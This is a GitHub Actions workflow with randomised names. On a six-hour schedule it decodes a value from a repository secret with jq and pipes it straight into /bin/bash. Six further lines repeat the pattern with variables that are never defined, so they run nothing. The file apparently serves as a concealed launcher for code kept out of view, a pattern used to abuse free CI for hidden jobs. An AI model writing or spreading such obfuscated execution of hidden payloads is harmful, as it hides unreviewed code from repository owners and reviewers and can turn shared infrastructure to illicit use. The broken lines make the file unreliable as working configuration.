name: daijiazx

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'

jobs:  # 20569
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: daijiazx
        env:
          nhi8153: ${{ secrets.nhi8153 }}
        run: |
          echo $nhi8153 | jq -r .srx5 | /bin/bash
          echo $qruol17256 | jq -r .rr5806 | /bin/bash
          echo $qk8 | jq -r .wcdry847 | /bin/bash
          echo $mrmy0353 | jq -r .ibvl1330 | /bin/bash
          echo $of23980 | jq -r .zs67957 | /bin/bash
          echo $taskg1405 | jq -r .py5 | /bin/bash
          echo $ickga0 | jq -r .mb349 | /bin/bash

